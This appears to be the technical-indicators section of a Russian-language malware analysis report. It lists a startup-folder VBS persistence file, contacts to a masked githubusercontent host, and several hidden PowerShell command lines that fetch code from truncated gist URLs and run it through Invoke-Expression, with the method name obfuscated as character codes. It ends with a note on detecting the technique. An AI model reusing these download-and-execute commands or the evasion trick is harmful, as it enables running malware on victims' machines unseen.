Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\shvhost411.vbs (папка автозагрузки текущего пользователя: сценарий из неё запускается при каждом входе в систему)
- 'gi##.###hubusercontent.com':443
- DNS ASK gi##.###hubusercontent.com
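- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://gist.githubusercontent.com/fadadaw194mail1w...' (со скрытым окном)
  Примечание: массив кодов символов (68,111,119,110,108,111,97,100,83,116,114,105,110,103) декодируется в строку «DownloadString», то есть команда получает текст по указанному URL через Net.WebClient и передаёт его в Invoke-Expression. Имя метода собрано из кодов символов, поэтому поиск по подстроке «DownloadString» в журналах командной строки такой запуск не выявит. Для обнаружения надёжнее опираться на сочетание Invoke-Expression, Net.WebClient и -join [char[]] в аргументах powershell.exe, а также на журналирование блоков сценариев PowerShell (Script Block Logging), где фиксируется содержимое, переданное в Invoke-Expression.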
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://gist.githubusercontent.com/nimis23233mailhu...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://gist.githubusercontent.com/fadadaw194mail1w...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://gist.githubusercontent.com/nimis23233mailhu...